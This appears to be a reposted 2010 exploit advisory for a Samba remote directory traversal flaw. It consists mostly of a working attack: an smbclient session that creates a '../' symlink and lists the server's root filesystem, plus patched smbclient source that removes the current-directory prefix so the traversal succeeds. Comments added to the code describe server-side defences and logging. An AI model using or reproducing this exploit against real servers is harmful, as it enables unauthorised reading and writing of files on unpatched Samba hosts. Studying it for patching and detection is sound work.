
Re: Samba Remote Zero-Day Exploit

2010-02-0600:00:00

Samba Remote Directory Traversal
logic fuckup discovered & exploited by Kingcope in 2010

It seems a quite similar bug was found back in 2004:
http://marc.info/?l=bugtraq&m=109658688505723&w=2

A remote attacker can list, read and retrieve nearly all files on the system.
What is required is a valid Samba account for a writeable share, OR
a writeable share that is configured as a guest-account share;
in the latter case this is a pre-authentication exploit.

The attacker can also write, for example into /tmp or wherever the account
he is connecting with has access (/home/<user> etc.).

Exploit session (using the patched smbclient exploit):

smb is a Samba user created for this session.

root@nr-pentest:~/Downloads/samba-3.4.5/source3# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -Usmb //<host>/testmount/
Enter smb's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]
smb: \> ls
. D 0 Wed Feb 3 14:27:03 2010
.. D 0 Wed Feb 3 14:19:13 2010
test D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010

            45503 blocks of size 2097152. 24437 blocks available

smb: \> symlink …/…/…/…/…/ foobar
smb: \> ls
. D 0 Wed Feb 3 14:27:47 2010
.. D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010
foobar D 0 Mon Feb 1 20:29:12 2010

            45503 blocks of size 2097152. 24437 blocks available

smb: \> ls ..
NT_STATUS_OBJECT_PATH_SYNTAX_BAD listing \..

            45503 blocks of size 2097152. 24437 blocks available

smb: \> cd foobar
smb: \foobar\> ls
. D 0 Mon Feb 1 20:29:12 2010
.. D 0 Mon Feb 1 20:29:12 2010
initrd.img.old 7646184 Mon Jan 18 13:15:48 2010
boot.ini 18832 Mon Feb 1 20:29:12 2010
home D 0 Mon Jan 18 13:08:24 2010
initrd.img 8007195 Thu Jan 21 21:51:26 2010
.cache DH 0 Sat Jan 23 14:19:08 2010
opt D 0 Sat Jan 30 11:39:59 2010
lib D 0 Thu Jan 21 21:13:01 2010
usr D 0 Sun Jan 31 22:08:11 2010
.libs DH 0 Thu Jan 21 12:30:48 2010
var D 0 Sun Jan 31 21:14:42 2010
bin D 0 Mon Jan 18 13:31:14 2010
selinux D 0 Tue Oct 20 01:05:22 2009
root D 0 Tue Feb 2 19:43:59 2010
vmlinuz.old 3890400 Fri Oct 16 20:03:49 2009
vmlinuz 3890560 Thu Dec 10 20:33:26 2009
etc D 0 Wed Feb 3 14:17:29 2010
srv D 0 Sat Jan 23 20:17:29 2010
proc DR 0 Wed Feb 3 14:10:41 2010
dev D 0 Wed Feb 3 14:11:02 2010
boot D 0 Thu Jan 21 21:51:26 2010
mnt D 0 Sat Jan 23 19:26:23 2010
media D 0 Fri Jan 29 08:32:31 2010
cdrom D 0 Mon Jan 18 12:40:11 2010
tmp D 0 Wed Feb 3 14:26:20 2010
sbin D 0 Thu Jan 21 21:50:58 2010
lost+found D 0 Mon Jan 18 12:39:57 2010
sys D 0 Wed Feb 3 14:10:41 2010

            45503 blocks of size 2097152. 24437 blocks available

smb: \foobar\>

put and get work in the folder now!

Listing the open shares; this is normal operation mode, not an exploit:

root@nr-pentest:~/Downloads/samba-3.4.5/source3/client# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -L //<host>/
Enter root's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

    Sharename       Type      Comment
    ---------       ----      -------
    testmount       Disk                                                            // < this share is writable and exploitable!!
    print$          Disk      Printer Drivers
    IPC$            IPC       IPC Service (nr-pentest server (Samba, Ubuntu))

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

    Server               Comment
    ---------            -------
    NR-PENTEST           nr-pentest server (Samba, Ubuntu)

    Workgroup            Master
    ---------            -------
    WORKGROUP            NR-PENTEST

smbclient patch (exploit):

samba-3.4.5/source3/client/client.c
/****************************************************************************
UNIX symlink.
****************************************************************************/

/*
 * smbclient "symlink <oldname> <newname>" command handler, as patched in this
 * advisory.  Reads the two path tokens from cmd_ptr, allocates oldname/newname
 * from the tokens alone, resolves oldname to the server that will hold the
 * link, checks that this server advertises the UNIX CIFS extensions, and asks
 * it to create the symlink.  Returns 0 on success, 1 on a usage error, an
 * allocation failure, or a failed server call (the error is printed with
 * d_printf first).
 *
 * What the patch changes (see the commented-out original further down): stock
 * smbclient prefixed both names with client_get_cur_dir(); here the tokens are
 * passed on verbatim, so a link target containing ".." components is no longer
 * anchored to the current share directory by the client.  Whether such a target
 * is honoured is decided entirely by smbd, not by this client code -- the
 * session transcript in this advisory shows a server that followed it.  The
 * defence is therefore server-side: smbd's handling of symlinks that resolve
 * outside the share root (the `wide links` / `unix extensions` smb.conf
 * settings in this Samba generation -- confirm against the deployed version),
 * plus server-side logging of UNIX-extension symlink requests whose target
 * contains ".." components, which is the observable for this technique.
 */
static int cmd_symlink(void)
{
TALLOC_CTX *ctx = talloc_tos();
char *oldname = NULL;
char *newname = NULL;
char *buf = NULL;
char *buf2 = NULL;
char *targetname = NULL;
struct cli_state *targetcli;

    /* two tokens are required: the link target, then the link name */
    if &#40;!next_token_talloc&#40;ctx, &amp;cmd_ptr,&amp;buf,NULL&#41; ||
        !next_token_talloc&#40;ctx, &amp;cmd_ptr,&amp;buf2,NULL&#41;&#41; {
            d_printf&#40;&quot;symlink &lt;oldname&gt; &lt;newname&gt;&#92;n&quot;&#41;;
            return 1;
    }
    /* patched: oldname is the target token exactly as typed (no cwd prefix) */
    oldname = talloc_asprintf&#40;ctx,                  
                    &quot;&#37;s&quot;,                           // &lt;&lt; HERE modified
                    buf&#41;;                           
    if &#40;!oldname&#41; {
            return 1;
    }
    /* patched: newname is likewise taken verbatim */
    newname = talloc_asprintf&#40;ctx,
                    &quot;&#37;s&quot;,                           // &lt;&lt; HERE modified
                    buf2&#41;;
    if &#40;!newname&#41; {
            return 1;
    }

/* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE).
oldname = talloc_asprintf(ctx,
"%s%s", // < modified (see above)
client_get_cur_dir(), // < removed (see above)
buf);
if (!oldname) {
return 1;
}
newname = talloc_asprintf(ctx,
"%s%s", // < modified (see above)
client_get_cur_dir(), // < removed (see above)
buf2);
if (!newname) {
return 1;
}
----------------------------------------------*/

    /* resolve oldname to the server that will create the link; on failure
     * the error text is read from the original connection, cli */
    if &#40;!cli_resolve_path&#40;ctx, &quot;&quot;, auth_info, cli, oldname, &amp;targetcli, &amp;targetname&#41;&#41; {
            d_printf&#40;&quot;link &#37;s: &#37;s&#92;n&quot;, oldname, cli_errstr&#40;cli&#41;&#41;;
            return 1;

    }

    /* symlink creation is a UNIX CIFS extension; bail out if the resolved
     * server does not advertise it */
    if &#40;!SERVER_HAS_UNIX_CIFS&#40;targetcli&#41;&#41; {
            d_printf&#40;&quot;Server doesn&#39;t support UNIX CIFS calls.&#92;n&quot;&#41;;
            return 1;
    }

    /* ask the resolved server to create newname pointing at targetname;
     * the failure message prints them in the order newname -> targetname */
    if &#40;!cli_unix_symlink&#40;targetcli, targetname, newname&#41;&#41; {
            d_printf&#40;&quot;&#37;s symlinking files &#40;&#37;s -&gt; &#37;s&#41;&#92;n&quot;,
                    cli_errstr&#40;targetcli&#41;, newname, targetname&#41;;
            return 1;
    }

    return 0;

}

// Cheers,
// kcope